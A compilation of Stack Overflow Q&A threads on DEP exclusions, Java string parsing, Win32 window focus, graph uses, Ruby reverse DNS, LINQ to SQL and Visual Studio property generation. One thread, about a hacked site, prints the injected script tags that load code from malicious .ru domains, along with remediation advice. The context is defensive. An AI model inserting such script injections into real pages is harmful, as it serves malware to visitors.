Q: How to get Indexing Service and MODI to produce Full-text over OCR? I have configured Indexing Service to index my files, which also include scanned images saved as hi-res TIFF files. I also installed MS Office 2003+ and configured MS Office Document Imaging (MODI) correctly, so I can perform OCR on my images and even embed the OCR'd text into TIFFs.
Indexing Service is able to index and find those TIFFs that were manually OCR'd and re-saved with text data (using the MS Document Imaging tool).
It turns out that Data Execution Prevention (DEP), which is deployed with Windows XP SP2, thinks MODI is malicious and refuses to let it do its magic. I have been able to get it to work by turning DEP off completely, but I found this solution to be inelegant.
Is there a better solution to make this work, without disabling DEP?
A: Disable DEP for specific applications.
How to Disable DEP for Specific Applications
*
*Click the Start button on your Windows computer and choose Computer > System Properties > Advanced System Settings.
*From the System Properties dialog, select Settings.
*Select the Data Execution Prevention tab.
*Select Turn on DEP for all programs and services except those I select.
*Click Add and use the browse feature to browse to the program executable you want to exclude—for example, excel.exe or word.exe.
Depending on your version of Windows, you may instead need to access the System Properties dialog box by right-clicking This PC or Computer from Windows Explorer:
*
*In Windows Explorer, right-click and choose Properties > Advanced System Settings > System Properties.
*Select Advanced > Performance > Data Execution Prevention.
*Select Turn on DEP for all programs and services except those I select.
*Click Add and use the browse feature to browse to the program executable you want to exclude.
Exclude:
C:\Program Files\Common Files\Microsoft Shared\MODI\11.0\MSPOCRDC.EXE
C:\Program Files\Common Files\Microsoft Shared\MODI\11.0\MSPSCAN.EXE
C:\Program Files\Common Files\Microsoft Shared\MODI\11.0\MSPVIEW.EXE
Additional information not part of the answer:
To obtain and install MODI on newer versions of Windows, see:
"Microsoft Office Document Imaging – Office 2010 to Office 2016"
References:
"Exclude Programs From DEP (Data Execution Prevention)"
"Microsoft Office Document Scanning error"
MODI is part of (free) "Microsoft SharePoint Designer 2007".
| {
"language": "en",
"url": "https://stackoverflow.com/questions/2959",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "75"
} |
Q: What are the different methods to parse strings in Java? For parsing player commands, I've most often used the split method to split a string by delimiters and then to then just figure out the rest by a series of ifs or switches. What are some different ways of parsing strings in Java?
A: I would look at Java migrations of Zork, and lean towards a simple Natural Language Processor (driven either by tokenizing or regex) such as the following (from this link):
// Requires: import java.util.Vector;
public static boolean simpleNLP(String inputline, String keywords[]) {
    if (inputline.length() < 1)
        return false; // check for blank and empty lines

    // Lex the input line into space-separated tokens
    Vector<String> lexed = new Vector<String>();
    int from = 0, to = 0;
    while (from < inputline.length() && inputline.charAt(from) == ' ')
        from++; // skip leading spaces
    while (to >= 0 && from < inputline.length()) {
        to = inputline.indexOf(' ', from);
        if (to > 0) {
            lexed.addElement(inputline.substring(from, to));
            from = to;
            while (from < inputline.length() && inputline.charAt(from) == ' ')
                from++; // skip runs of spaces
        }
    }
    if (from < inputline.length())
        lexed.addElement(inputline.substring(from)); // trailing token

    // Check that the keywords appear, in order, among the tokens
    boolean status = false;
    int keyword = 0;
    for (int i = 0; i < lexed.size(); i++) {
        if (lexed.elementAt(i).equalsIgnoreCase(keywords[keyword])) {
            keyword++;
            if (keyword >= keywords.length) { status = true; break; }
        }
    }
    return status;
}
...
Anything which gives a programmer a reason to look at Zork again is good in my book, just watch out for Grues.
...
A: Sun itself recommends staying away from StringTokenizer and using the String.split method instead.
You'll also want to look at the Pattern class.
A: Another vote for ANTLR/ANTLRWorks. If you create two versions of the file, one with the Java code for actually executing the commands, and one without (with just the grammar), then you have an executable specification of the language, which is great for testing, a boon for documentation, and a big timesaver if you ever decide to port it.
A: If this is to parse command lines I would suggest using Commons Cli.
The Apache Commons CLI library provides an API for processing command line interfaces.
A: Try JavaCC a parser generator for Java.
It has a lot of features for interpreting languages, and it's well supported on Eclipse.
A: @CodingTheWheel Here's your code, cleaned up a bit, run through Eclipse (Ctrl+Shift+F), and inserted back here :)
Including the four spaces in front of each line.
// Requires: import java.util.List; import java.util.ArrayList;
public static boolean simpleNLP(String inputline, String keywords[]) {
    if (inputline.length() < 1)
        return false;

    List<String> lexed = new ArrayList<String>();
    for (String ele : inputline.split(" ")) {
        lexed.add(ele);
    }

    boolean status = false;
    int to = 0;
    for (int i = 0; i < lexed.size(); i++) {
        String s = lexed.get(i);
        if (s.equalsIgnoreCase(keywords[to])) {
            to++;
            if (to >= keywords.length) {
                status = true;
                break;
            }
        }
    }
    return status;
}
A: I really like regular expressions. As long as the command strings are fairly simple, you can write a few regexes that replace what could otherwise take a few pages of code to parse manually.
I would suggest you check out http://www.regular-expressions.info for a good intro to regexes, as well as specific examples for Java.
A: I assume you're trying to make the command interface as forgiving as possible. If this is the case, I suggest you use an algorithm similar to this (a rough code sketch follows the list):
*
*Read in the string
*
*Split the string into tokens
*Use a dictionary to convert synonyms to a common form
*For example, convert "hit", "punch", "strike", and "kick" all to "hit"
*Perform actions on an unordered, inclusive base
*Unordered - "punch the monkey in the face" is the same thing as "the face in the monkey punch"
*Inclusive - If the command is supposed to be "punch the monkey in the face" and they supply "punch monkey", you should check how many commands this matches. If only one command matches, do that action. It might even be a good idea to have command priorities so that, even if there were several matches, it would simply perform the top action.
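A rough Java sketch of those steps (the synonym table, command list, and all names here are illustrative assumptions, not a complete design):
import java.util.*;

public class CommandMatcher {
    // Dictionary mapping synonyms to a common form.
    static final Map<String, String> SYNONYMS =
            Map.of("punch", "hit", "strike", "hit", "kick", "hit");

    // Each known command is a set of canonical words (order is ignored).
    static final List<Set<String>> COMMANDS = List.of(
            Set.of("hit", "monkey", "face"),
            Set.of("open", "door"));

    // Union of all command words, used to drop filler like "the" and "in".
    static final Set<String> VOCABULARY = new HashSet<>();
    static {
        COMMANDS.forEach(VOCABULARY::addAll);
    }

    static List<Set<String>> match(String input) {
        // Split into tokens, then convert synonyms to their common form.
        Set<String> words = new HashSet<>();
        for (String t : input.toLowerCase().split("\\s+")) {
            String w = SYNONYMS.getOrDefault(t, t);
            if (VOCABULARY.contains(w))
                words.add(w);
        }
        // Unordered, inclusive match: "punch monkey" matches the
        // hit-monkey-face command because every supplied word is in it.
        List<Set<String>> hits = new ArrayList<>();
        for (Set<String> cmd : COMMANDS)
            if (!words.isEmpty() && cmd.containsAll(words))
                hits.add(cmd);
        return hits; // act only if exactly one match (or pick by priority)
    }
}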
A: Parsing manually is a lot of fun... at the beginning:)
In practice, if commands aren't very sophisticated you can treat them the same way as those used in command-line interpreters. There's a list of libraries that you can use: http://java-source.net/open-source/command-line. I think you can start with Apache Commons CLI or args4j (which uses annotations). They are well documented and really simple to use. They handle parsing automatically, and the only thing you need to do is to read particular fields in an object.
If you have more sophisticated commands, then maybe creating a formal grammar would be a better idea. There is a very good library with a graphical editor, debugger and interpreter for grammars. It's called ANTLR (and the editor, ANTLRWorks), and it's free :) There are also some example grammars and tutorials.
A: A simple string tokenizer on spaces should work, but there are really many ways you could do this.
Here is an example using a tokenizer:
String command = "kick person";
StringTokenizer tokens = new StringTokenizer(command);
String action = null;
if (tokens.hasMoreTokens()) {
    action = tokens.nextToken();
}
if (action != null) {
    doCommand(action, tokens);
}
Then tokens can be further used for the arguments. This all assumes no spaces are used in the arguments... so you might want to roll your own simple parsing mechanism (like getting the first whitespace and using text before as the action, or using a regular expression if you don't mind the speed hit), just abstract it out so it can be used anywhere.
A: When the separator for the command is always the same string or character (like ";"), I recommend you use the StringTokenizer class:
StringTokenizer
But when the separator varies or is complex, I recommend you use regular expressions, which can be used by the String class itself via the split method, available since Java 1.4. It uses the Pattern class from the java.util.regex package:
Pattern
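For example, a minimal sketch contrasting the two approaches (the command strings here are made up):
import java.util.StringTokenizer;

public class SeparatorDemo {
    public static void main(String[] args) {
        // Fixed single-character separator: StringTokenizer is enough.
        StringTokenizer st = new StringTokenizer("go north;take lamp;look", ";");
        while (st.hasMoreTokens())
            System.out.println(st.nextToken());

        // Varying or complex separator: String.split with a regex
        // (";" or "," with optional surrounding spaces).
        for (String part : "go north ; take lamp, look".split("\\s*[;,]\\s*"))
            System.out.println(part);
    }
}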
A: If the language is dead simple like just
VERB NOUN
then splitting by hand works well.
If it's more complex, you should really look into a tool like ANTLR or JavaCC.
I've got a tutorial on ANTLR (v2) at http://javadude.com/articles/antlrtut which will give you an idea of how it works.
A: JCommander seems quite good, although I have yet to test it.
A: If your text contains delimiters, then you can use the split method.
If the text contains irregular strings, meaning different formats within it, then you must use regular expressions.
A: The split method can split a string into an array of substrings around matches of the given regular expression.
It comes in two forms, namely split(String regex) and split(String regex, int limit); split(String regex) actually calls split(String regex, int limit) with a limit of 0. So what do limit > 0 and limit < 0 mean?
The JDK explains: when limit > 0, the pattern is applied at most limit - 1 times, so the resulting array has at most limit elements, with the remainder of the string left in the last element;
limit < 0 means there is no limit on the length of the array (trailing empty strings are kept);
limit = 0 means trailing empty strings are removed from the result.
The StringTokenizer class is a legacy class that is preserved for compatibility reasons, so we should prefer the split method of the String class.
Refer to this link.
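For example, a small sketch of the three limit cases (expected output noted in the comments):
public class SplitLimitDemo {
    public static void main(String[] args) {
        String s = "a,b,c,,";
        // limit > 0: at most 2 elements; the rest stays in the last one
        System.out.println(java.util.Arrays.toString(s.split(",", 2)));   // [a, b,c,,]
        // limit < 0: no length limit; trailing empty strings are kept
        System.out.println(java.util.Arrays.toString(s.split(",", -1)));  // [a, b, c, , ]
        // limit = 0: trailing empty strings are removed
        System.out.println(java.util.Arrays.toString(s.split(",")));      // [a, b, c]
    }
}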
| {
"language": "en",
"url": "https://stackoverflow.com/questions/2968",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "55"
} |
Q: My website got hacked.. What should I do? My dad called me today and said people going to his website were getting 168 viruses trying to download to their computers. He isn't technical at all, and built the whole thing with a WYSIWYG editor.
I popped his site open and viewed the source, and there was a line of Javascript includes at the bottom of the source right before the closing HTML tag. They included this file (among many others): http://www.98hs.ru/js.js <-- TURN OFF JAVASCRIPT BEFORE YOU GO TO THAT URL.
So I commented it out for now. It turns out his FTP password was a plain dictionary word six letters long, so we think that's how it got hacked. We've changed his password to an 8+ digit non-word string (he wouldn't go for a passphrase since he is a hunt-n-peck typer).
I did a whois on 98hs.ru and found it is hosted from a server in Chile. There is actually an e-mail address associated with it too, but I seriously doubt this person is the culprit. Probably just some other site that got hacked...
I have no idea what to do at this point though as I've never dealt with this sort of thing before. Anyone have any suggestions?
He was using plain jane un-secured ftp through webhost4life.com. I don't even see a way to do sftp on their site. I'm thinking his username and password got intercepted?
So, to make this more relevant to the community, what are the steps you should take/best practices you should follow to protect your website from getting hacked?
For the record, here is the line of code that "magically" got added to his file (and isn't in his file on his computer -- I've left it commented out just to make absolute sure it won't do anything on this page, although I'm sure Jeff would guard against this):
<!--script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script 
src=http://www.uhwc.ru/js.js></script-->
A: You mention your Dad was using a website publishing tool.
If the publishing tool publishes from his computer to the server, it may be the case that his local files are clean, and that he just needs to republish to the server.
He should see if there's a different login method to his server than plain FTP, though... that's not very secure because it sends his password as clear-text over the internet.
A: With a six-character dictionary-word password, he may have been brute-forced. That is more likely than his FTP being intercepted, but it could be that too.
Start with a stronger password. (8 characters is still fairly weak.)
See if this link to an internet security blog is helpful.
A: Is the site just plain static HTML? i.e. he hasn't managed to code himself an upload page that permits anyone driving by to upload compromised scripts/pages?
Why not ask webhost4life if they have any FTP logs available, and report the issue to them? You never know, they may be quite receptive and find out for you exactly what happened.
I work for a shared hoster, and we always welcome reports such as these; we can usually pinpoint the exact vector of attack and advise as to where the customer went wrong.
A: Try and gather as much information as you can. See if the host can give you a log showing all the FTP connections that were made to your account. You can use those to see if it was even an FTP connection that was used to make the change and possibly get an IP address.
If you're using a prepacked software like Wordpress, Drupal, or anything else that you didn't code there may be vulnerabilities in upload code that allows for this sort of modification. If it is custom built, double check any places where you allow users to upload files or modify existing files.
The second thing would be to take a dump of the site as-is and check everything for other modifications. It may just be one single modification they made, but if they got in via FTP who knows what else is up there.
Revert your site back to a known good status and, if need be, upgrade to the latest version.
There is a level of return you have to take into account too. Is the damage worth trying to track the person down or is this something where you just live and learn and use stronger passwords?
A: I know this is a little late in the game, but the URL mentioned for the JavaScript is mentioned in a list of sites known to have been part of the ASPRox bot resurgence that started up in June (at least that's when we were getting flagged with it). Some details about it are mentioned below:
http://www.bloombit.com/Articles/2008/05/ASCII-Encoded-Binary-String-Automated-SQL-Injection.aspx
The nasty thing about this is that effectively every varchar-type field in the database is "infected" to spit out a reference to this URL, through which the browser gets a tiny iframe that turns it into a bot. A basic SQL fix for this can be found here:
http://aspadvice.com/blogs/programming_shorts/archive/2008/06/27/Asprox-Recovery.aspx
The scary thing though is that the virus looks to the system tables for values to infect and a lot of shared hosting plans also share the database space for their clients. So most likely it wasn't even your dad's site that was infected, but somebody else's site within his hosting cluster that wrote some poor code and opened the door to SQL Injection attack.
If he hasn't done so yet, I'd send an URGENT e-mail to their host and give them a link to that SQL code to fix the entire system. You can fix your own affected database tables, but most likely the bots that are doing the infection are going to pass right through that hole again and infect the whole lot.
Hopefully this gives you some more info to work with.
EDIT: One more quick thought, if he's using one of the hosts online design tools for building his website, all of that content is probably sitting in a column and was infected that way.
A: Unplug the webserver without shutting it down to avoid shutdown scripts. Analyze the hard disk through another computer as a data drive and see if you can determine the culprit through log files and things of that nature. Verify that the code is safe and then restore it from a backup.
A: This happened to a client of mine recently who was hosted on ipower. I'm not sure if your hosting environment is Apache based, but if it is, be sure to double-check for .htaccess files that you did not create, particularly above the webroot and inside image directories, as attackers tend to inject some nastiness there as well (they were redirecting people depending on where they came from in the referrer). Also check any .htaccess files that you did create for code that you did not write.
A: We were hacked by the same guys, apparently! Or by their bots, in our case. They used SQL injection in the URL against some old classic ASP sites that nobody maintains anymore. We found the attacking IPs and blocked them in IIS. Now we must refactor all the old ASP.
So, my advice is to take a look at the IIS logs first, to find out whether the problem is in your site's code or in the server configuration.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/2970",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "23"
} |
Q: Bringing Window to the Front in C# using Win32 API I am writing an application that needs to bring window of an external app to the foreground, and not necessarily steal focus (there is a setting the user can toggle to steal/not steal focus).
What is the best way to go about this using the Win32 API? I have tried SetForegroundWindow(), but it always steals focus and does not consistently work.
What is the best way to go about this? Any thoughts?
A:
What is the difference between SetForeGroundWindow, SetActiveWindow, and BringWindowToTop? It appears as if they all do the same thing.
According to MSDN, SetForegroundWindow will activate the window and direct keyboard focus to it. This attempts to work even when your process is in the background. SetActiveWindow does the same thing as SetForegroundWindow, but it doesn't do anything if your application isn't the frontmost application. Finally, BringWindowToTop only brings the window to the top, and doesn't change the keyboard focus.
A: You can try the BringWindowToTop function to not steal focus. I haven't used it, but it seems to be what you're looking for.
A: Have you tried using SetWindowPos? This is the canonical function for moving, resizing and setting z-order in Windows. There is a SWP_NOACTIVATE flag you can use. Look at http://msdn.microsoft.com/en-us/library/ms633545(VS.85).aspx. I have not tried this on a window belonging to another process, but it is probably worth a try.
A: SetForegroundWindow is supposed to steal focus and there are certain cases where it will fail.
The SetForegroundWindow function puts the thread that created the specified window into the foreground and activates the window. Keyboard input is directed to the window
Try capturing the focus with SetCapture prior to making the call. Also look into different ways of bringing the window to the front: SetForegroundWindow, SetActiveWindow, even simulating a mouse click can do this.
A: SetWindowPos + SWP_NOACTIVATE does the job.
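For illustration, here is a minimal C# P/Invoke sketch of that approach (the helper class and method names are my own; the flag values come from WinUser.h):
using System;
using System.Runtime.InteropServices;

static class WindowHelper
{
    [DllImport("user32.dll", SetLastError = true)]
    static extern bool SetWindowPos(IntPtr hWnd, IntPtr hWndInsertAfter,
        int X, int Y, int cx, int cy, uint uFlags);

    static readonly IntPtr HWND_TOP = IntPtr.Zero;
    const uint SWP_NOSIZE     = 0x0001;
    const uint SWP_NOMOVE     = 0x0002;
    const uint SWP_NOACTIVATE = 0x0010;

    // Bring a window to the top of the Z-order without giving it focus.
    public static void BringToFrontWithoutFocus(IntPtr hWnd)
    {
        SetWindowPos(hWnd, HWND_TOP, 0, 0, 0, 0,
            SWP_NOMOVE | SWP_NOSIZE | SWP_NOACTIVATE);
    }
}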
A: You could use FindWindow to get the HWND of the window, then use the BringWindowToTop function found in the Win32 API.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/2987",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "47"
} |
Q: What problems can be solved, or tackled more easily, using graphs and trees? What are the most common problems that can be solved with both these data structures?
It would be good for me to have also recommendations on books that:
*
*Implement the structures
*Implement and explain the reasoning of the algorithms that use them
A: Circuit diagrams.
Compilation (Directed Acyclic graphs)
Maps. Very compact as graphs.
Network flow problems.
Decision trees for expert systems (sic)
Fishbone diagrams for fault finding, process improvement, and safety analysis. For bonus points, implement your error recovery code as objects that are the fishbone diagram.
A: Just about every problem can be re-written in terms of graph theory. I'm not kidding, look at any book on NP complete problems, there are some pretty wacky problems that get turned into graph theory because we have good tools for working with graphs...
A: The Algorithm Design Manual contains some interesting case studies with creative use of graphs. Despite its name, the book is very readable and even entertaining at times.
A: The first thing I think about when I read this question is: what types of things use graphs/trees? and then I think backwards to how I could use them.
For example, take two common uses of a tree:
*
*The DOM
*File systems
The DOM, and XML for that matter, resemble tree structures.
It makes sense, too. It makes sense because of how this data needs to be arranged. A file system, too. On a UNIX system there's a root node, and branching down below. When you mount a new device, you're attaching it onto the tree.
You should also be asking yourself: does the data fall into this type of structure? Create data structures that make sense to the problem and the rest will follow.
As far as being easier, I think thats relative. Are you good with recursive functions to traverse a tree/graph? What if you need to balance the tree?
Think about a program that solves a word search puzzle. You could map out all the letters of the word search into a graph and check surrounding nodes to see if that string is matching any of the words. But couldn't you just do the same with a single array? All you really need to do is move an index to check letters to the left and right, and by the width to check the letters above and below. Solving this problem with a graph isn't difficult, but it can create a lot of extra work and difficulty if you're not comfortable with using them - of course that shouldn't discourage you from doing it, especially if you are learning about them.
I hope that helps you think about these structures. As for a book recommendation, I'd have to go with Introduction to Algorithms.
A: There's a course for such things at my university: CSE 326. I didn't think the book was too useful, but the projects are fun and teach you a fair bit about implementing some of the simpler structures.
As for examples, one of the most common problems (by number of people using it) that's solved with trees is that of cell phone text entry. You can use trees, not necessarily binary, to represent the space of possible words that can come out of any given list of numbers that a user punches in very quickly.
A: Algorithms for Java: Part 5 by Robert Sedgewick is all about graph algorithms and datastructures. This would be a good first book to work through if you want to implement some graph algorithms.
A: Scene graphs for drawing graphics in games and multimedia applications heavily use trees and graphs. Nodes represents objects to be rendered, transformations, controls, groups, ...
Scene graphs usually have multiple layers and attributes, which means that you can draw only some nodes of a graph (attributes) in a specified order (layers). Depending on the kind of scene graph you have, it can have two parallel structures: declarations and instantiations.
A: @DavidJoiner / all:
FWIW: A new version of the Algorithm Design Manual is due out any day now.
The entire course that Prof. Skiena developed this book for is also available on the web:
http://www.cs.sunysb.edu/~algorith/video-lectures/2007-1.html
A: Trees are used a lot more in functional programming languages because of their recursive nature.
Also, graphs and trees are a good way to model a lot of AI problems.
A: Games often use graphs to facilitate finding paths across the game world. The graph representation of the world can have algorithms such as breadth-first search or A* in order to find a route across it.
They also often use trees to represent entities within the world. If you have thousands of entities and need to find one at a certain position then iterating linearly through a list can be inefficient, especially if you need to do it often. Therefore the area can be subdivided into a tree to allow it to be searched more quickly. Just as a linear space can be efficiently searched with a binary search (and thus divided into a binary tree), 2D space can be divided into a quadtree and 3D space into an octree.
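As a rough illustration of the pathfinding half of this, here is a minimal breadth-first search sketch in Java (the adjacency-map representation of the world and all names are assumptions):
import java.util.*;

public class PathFinder {
    public static List<Integer> bfsPath(Map<Integer, List<Integer>> adj,
                                        int start, int goal) {
        Map<Integer, Integer> parent = new HashMap<>(); // node -> predecessor
        Deque<Integer> queue = new ArrayDeque<>();
        parent.put(start, start);
        queue.add(start);
        while (!queue.isEmpty()) {
            int node = queue.poll();
            if (node == goal) { // walk the parents backwards to rebuild the route
                LinkedList<Integer> path = new LinkedList<>();
                for (int n = goal; n != start; n = parent.get(n))
                    path.addFirst(n);
                path.addFirst(start);
                return path;
            }
            for (int next : adj.getOrDefault(node, Collections.emptyList()))
                if (parent.putIfAbsent(next, node) == null) // not yet visited
                    queue.add(next);
        }
        return null; // goal not reachable from start
    }
}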
| {
"language": "en",
"url": "https://stackoverflow.com/questions/2988",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "17"
} |
Q: Reverse DNS in Ruby? I'm in an environment with a lot of computers that haven't been
properly inventoried. Basically, no one knows which IP goes with which
mac address and which hostname. So I wrote the following:
# This script goes down the entire IP range and attempts to
# retrieve the Hostname and mac address and outputs them
# into a file. Yay!
require "socket"
TwoOctets = "10.26"
def computer_exists?(computerip)
  system("ping -c 1 -W 1 #{computerip}")
end

def append_to_file(line)
  file = File.open("output.txt", "a")
  file.puts(line)
  file.close
end

def getInfo(current_ip)
  begin
    if computer_exists?(current_ip)
      arp_output = `arp -v #{current_ip}`
      mac_addr = arp_output.to_s.match(/..:..:..:..:..:../)
      host_name = Socket.gethostbyname(current_ip)
      append_to_file("#{host_name[0]} - #{current_ip} - #{mac_addr}\n")
    end
  rescue SocketError => mySocketError
    append_to_file("unknown - #{current_ip} - #{mac_addr}")
  end
end

(6..8).each do |i|
  case i
  when 6
    for j in (1..190)
      current_ip = "#{TwoOctets}.#{i}.#{j}"
      getInfo(current_ip)
    end
  when 7
    for j in (1..255)
      current_ip = "#{TwoOctets}.#{i}.#{j}"
      getInfo(current_ip)
    end
  when 8
    for j in (1..52)
      current_ip = "#{TwoOctets}.#{i}.#{j}"
      getInfo(current_ip)
    end
  end
end
Everything works except it does not find a Reverse DNS.
Sample output that I'm getting is this:
10.26.6.12 - 10.26.6.12 - 00:11:11:9B:13:9F
10.26.6.17 - 10.26.6.17 - 08:00:69:9A:97:C3
10.26.6.18 - 10.26.6.18 - 08:00:69:93:2C:E2
If I do nslookup 10.26.6.12 then I get the correct reverse DNS so
that shows that my machine is seeing the DNS server.
I have tried Socket.gethostbyname, gethostbyaddr, but it doesn't work.
Any guidance will be much appreciated.
A: I would check out getaddrinfo. If you replace the line:
host_name = Socket.gethostbyname(current_ip)
with:
host_name = Socket.getaddrinfo(current_ip, 0, Socket::AF_UNSPEC, Socket::SOCK_STREAM, nil, Socket::AI_CANONNAME)[0][1]
The getaddrinfo function returns an array of arrays. You can read more about it at:
Ruby Socket Docs
A: Today I also needed reverse DNS lookup and I've found very simple standard solution:
require 'resolv'
host_name = Resolv.getname(ip_address_here)
It seems it uses timeout which helps in rough cases.
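Applied to the script in the question, that might look like the following sketch (Resolv.getname raises Resolv::ResolvError when the lookup fails):
require 'resolv'

def reverse_dns(ip)
  Resolv.getname(ip)
rescue Resolv::ResolvError
  'unknown' # no PTR record, or the lookup timed out
end

puts reverse_dns('10.26.6.12')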
A: This also works:
host_name = Socket.getaddrinfo(current_ip,nil)
append_to_file("#{host_name[0][2]} - #{current_ip} - #{mac_addr}\n")
I'm not sure why gethostbyaddr didn't also work.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/2993",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "22"
} |
Q: Using ASP.NET Dynamic Data / LINQ to SQL, how do you have two table fields have a relationship to the same foreign key? I am using ASP.NET Dynamic Data for a project and I have a table that has two separate fields that link to the same foreign key in a different table.
This relationship works fine in SQL Server.
However, in the LINQ to SQL model in the ASP.NET Dynamic Data model, only the first field's relationship is reflected. If I attempt to add the second relationship manually, it complains that it "Cannot create an association "ForeignTable_BaseTable". The same property is listed more than once: "Id"."
This MSDN article gives such helpful advice as:
*
*Examine the message and note the property specified in the message.
*Click OK to dismiss the message box.
*Inspect the Association Properties and remove the duplicate entries.
*Click OK.
A: The solution is to delete and re-add BOTH tables to the LINQ to SQL diagram, not just the one you have added the second field and keys to.
Alternatively, it appears you can make two associations using the LINQ to SQL interface - just don't try and bundle them into a single association.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3004",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "14"
} |
Q: How can we generate getters and setters in Visual Studio? By "generate", I mean auto-generation of the code necessary for a particular selected (set of) variable(s).
But any more explicit explication or comment on good practice is welcome.
A: If you are using Visual Studio 2005 and up, you can create a setter/getter real fast using the insert snippet command.
Right click on your code, click on Insert Snippet (Ctrl+K,X), and then choose "prop" from the list.
A: Visual Studio also has a feature that will generate a Property from a private variable.
If you right-click on a variable, in the context menu that pops up, click on the "Refactor" item, and then choose Encapsulate Field.... This will create a getter/setter property for a variable.
I'm not too big a fan of this technique as it is a little bit awkward to use if you have to create a lot of getters/setters, and it puts the property directly below the private field, which bugs me, because I usually have all of my private fields grouped together, and this Visual Studio feature breaks my class' formatting.
A: I use Visual Studio 2013 Professional.
*
*Place your cursor at the line of an instance variable.
*Press the key combination Ctrl + R, Ctrl + E, or click the right mouse button and choose the context menu item Refactor → Encapsulate Field..., and then press OK.
*In Preview Reference Changes - Encapsulate Field dialog, press button Apply.
*This is the result:
You can also place the cursor on the field to choose a property, then use the menu Edit → Refactor → Encapsulate Field...
*
*Other information:
Since C# 3.0 (November 19th 2007), we can use auto-implemented properties (this is merely syntactic sugar).
And
private int productID;

public int ProductID
{
    get { return productID; }
    set { productID = value; }
}
becomes
public int ProductID { get; set; }
A: If you're using ReSharper, go into the ReSharper menu → Code → Generate...
(Or hit Alt + Ins inside the surrounding class), and you'll get all the options for generating getters and/or setters you can think of :-)
A: Rather than using Ctrl + K, X you can also just type prop and then hit Tab twice.
A: I created my own snippet that only adds {get; set;}. I made it just because I find prop → Tab to be clunky.
<?xml version="1.0" encoding="utf-8"?>
<CodeSnippets
    xmlns="http://schemas.microsoft.com/VisualStudio/2005/CodeSnippet">
  <CodeSnippet Format="1.0.0">
    <Header>
      <Title>get set</Title>
      <Shortcut>get</Shortcut>
    </Header>
    <Snippet>
      <Code Language="CSharp">
        <![CDATA[{get; set;}]]>
      </Code>
    </Snippet>
  </CodeSnippet>
</CodeSnippets>
With this, you type your PropType and PropName manually, then type get → Tab, and it will add the get set. It's nothing magical, but since I tend to type my access modifier first anyway, I may as well finish out the name and type.
A: In Visual Studio Community Edition 2015 you can select all the fields you want and then press Ctrl + . to automatically generate the properties.
You have to choose whether or not you want to use the property instead of the field.
A: By generate, do you mean auto-generate? If that's not what you mean:
Visual Studio 2008 has the easiest implementation for this:
public PropertyType PropertyName { get; set; }
In the background this creates an implied instance variable in which your property value is stored and retrieved.
However if you want to put in more logic in your Properties, you will have to have an instance variable for it:
private PropertyType _property;

public PropertyType PropertyName
{
    get
    {
        // logic here
        return _property;
    }
    set
    {
        // logic here
        _property = value;
    }
}
Previous versions of Visual Studio always used this longhand method as well.
A: You can also use "propfull" and hit TAB twice.
The variable and property with get and set will be generated.
